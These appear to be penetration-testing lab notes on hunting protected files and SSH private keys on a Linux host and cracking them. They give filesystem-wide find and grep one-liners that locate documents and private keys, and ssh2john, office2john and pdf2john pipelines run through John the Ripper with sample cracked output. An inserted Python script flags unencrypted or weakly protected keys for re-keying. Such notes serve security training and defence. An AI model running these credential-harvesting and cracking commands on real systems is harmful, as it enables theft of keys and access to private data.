Protected Files

Grepping files on the system

for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name "*$ext" 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done
cry0l1t3@unixclient:~$ for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name "*$ext" 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done

File extension:  .xls

File extension:  .xls*

File extension:  .xltx

File extension:  .csv
/home/cry0l1t3/Docs/client-emails.csv
/home/cry0l1t3/ruby-2.7.3/gems/test-unit-3.3.4/test/fixtures/header-label.csv
/home/cry0l1t3/ruby-2.7.3/gems/test-unit-3.3.4/test/fixtures/header.csv
/home/cry0l1t3/ruby-2.7.3/gems/test-unit-3.3.4/test/fixtures/no-header.csv
/home/cry0l1t3/ruby-2.7.3/gems/test-unit-3.3.4/test/fixtures/plus.csv
/home/cry0l1t3/ruby-2.7.3/test/win32ole/orig_data.csv

File extension:  .od*
/home/cry0l1t3/Docs/document-temp.odt
/home/cry0l1t3/Docs/product-improvements.odp
/home/cry0l1t3/Docs/mgmt-spreadsheet.ods
...SNIP...

Grepping SSH Private Keys

The same search is shown in the SSH Keys section of Linux Credential Hunting.

grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
cry0l1t3@unixclient:~$ grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"

/home/cry0l1t3/.ssh/internal_db:1:-----BEGIN OPENSSH PRIVATE KEY-----
/home/cry0l1t3/.ssh/SSH.private:1:-----BEGIN OPENSSH PRIVATE KEY-----
/home/cry0l1t3/Mgmt/ceil.key:1:-----BEGIN OPENSSH PRIVATE KEY-----

Most private keys are encrypted with a passphrase; the Proc-Type and DEK-Info header lines of the key file show this:

cry0l1t3@unixclient:~$ cat /home/cry0l1t3/.ssh/SSH.private

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2109D25CC91F8DBFCEB0F7589066B2CC

8Uboy0afrTahejVGmB7kgvxkqJLOczb1I0/hEzPU1leCqhCKBlxYldM2s65jhflD
4/OH4ENhU7qpJ62KlrnZhFX8UwYBmebNDvG12oE7i21hB/9UqZmmHktjD3+OYTsD
...SNIP...
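
An added example, not part of the original notes: a defender-side check that classifies a key file by how its passphrase protection is stored, so keys with no passphrase or with the traditional PEM encryption shown above (whose key is derived from the passphrase with a single MD5 iteration) can be found and re-keyed. The names classify_key, sample_openssh and LEGACY are hypothetical; the samples are constructed, with LEGACY reusing the header lines of SSH.private over a placeholder body.

```python
import base64, binascii, re, struct
MAGIC = b"openssh-key-v1\0"
PEM = re.compile(r"-----BEGIN ([A-Z0-9 ]*?) ?PRIVATE KEY-----(.*?)(?:-----END|\Z)", re.S)

def _sshstr(buf, off):
    """Read one SSH wire string (uint32 length + bytes); return (value, next offset)."""
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n

def classify_key(text):
    """Return (format, protection) for the text of a private key file."""
    if not (m := PEM.search(text)):
        return ("not-a-key", "n/a")
    kind, body = m.groups()
    if kind == "OPENSSH":  # cipher and KDF names sit inside the base64 blob
        try:
            blob = base64.b64decode("".join(body.split()))
            if not blob.startswith(MAGIC):
                raise ValueError("bad magic")
            cipher, off = _sshstr(blob, len(MAGIC))
            kdf, off = _sshstr(blob, off)
            if cipher == b"none":
                return ("openssh", "UNENCRYPTED")
            if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
                opts, _ = _sshstr(blob, off)
                _, o = _sshstr(opts, 0)
                return ("openssh", "bcrypt rounds=%d" % struct.unpack_from(">I", opts, o))
            return ("openssh", "kdf=" + kdf.decode("ascii", "replace"))
        except (binascii.Error, struct.error, ValueError):
            return ("openssh", "unparseable")
    if kind == "ENCRYPTED":  # PKCS#8 EncryptedPrivateKeyInfo
        return ("pkcs8", "encrypted")
    dek = re.search(r"^DEK-Info: ([^,\s]+)", body, re.M)
    if "Proc-Type: 4,ENCRYPTED" in body and dek:  # the header shown on this page
        return ("legacy-pem", dek.group(1) + ", MD5 single-iteration KDF")
    return ("legacy-pem" if kind else "pkcs8", "UNENCRYPTED")

def sample_openssh(cipher, kdf, opts=b""):
    """Constructed OpenSSH key header for the demo; contains no key material."""
    s = lambda b: struct.pack(">I", len(b)) + b
    b64 = base64.b64encode(MAGIC + s(cipher) + s(kdf) + s(opts)).decode()
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n" + b64 + "\n-----END OPENSSH PRIVATE KEY-----\n"

# Constructed sample: header lines of SSH.private from this page, placeholder body.
LEGACY = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: "
          "AES-128-CBC,2109D25CC91F8DBFCEB0F7589066B2CC\n\nAAAA\n-----END RSA PRIVATE KEY-----\n")

if __name__ == "__main__":
    print(classify_key(LEGACY), classify_key(sample_openssh(b"none", b"none")))
```

Run classify_key over the contents of each file your own key inventory turns up; anything reported as UNENCRYPTED or legacy-pem is a candidate for re-keying in the OpenSSH format with a strong passphrase.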

Cracking Encrypted SSH Files

1. Turn the key file into a hash

/usr/share/john/ssh2john.py id_rsa > ssh.hash
> ssh2john.py SSH.private > ssh.hash
> cat ssh.hash 

ssh.private:$sshng$0$8$1C258238FD2D6EB0$2352$f7b...SNIP...

2. Crack it with john

john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
john ssh.hash --show
> john ssh.hash --show

SSH.private:1234

1 password hash cracked, 0 left

Cracking Microsoft Office Documents

/usr/share/john/office2john.py Protected.docx > protected-docx.hash
cat protected-docx.hash
Protected.docx:$office$*2007*20*128*16*7240...SNIP...8a69cf1*98242f4da37d916305d8e2821360773b7edc481b
john --wordlist=rockyou.txt protected-docx.hash
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2007 for all loaded hashes
Cost 2 (iteration count) is 50000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1234             (Protected.docx)
1g 0:00:00:00 DONE (2022-02-08 01:25) 2.083g/s 2266p/s 2266c/s 2266C/s trisha..heart
Use the "--show" option to display all of the cracked passwords reliably
Session completed
john protected-docx.hash --show
Protected.docx:1234

Cracking PDF Documents

pdf2john.py PDF.pdf > pdf.hash
cat pdf.hash 
john --wordlist=rockyou.txt pdf.hash
john pdf.hash --show

Mutation of password lists is crucial for cracking password-protected files and access points. Known password lists are often ineffective due to system defenses and users being forced to use stronger, random passwords or passphrases. Despite the challenges, cracking such files is worthwhile as they may contain sensitive data useful for further access.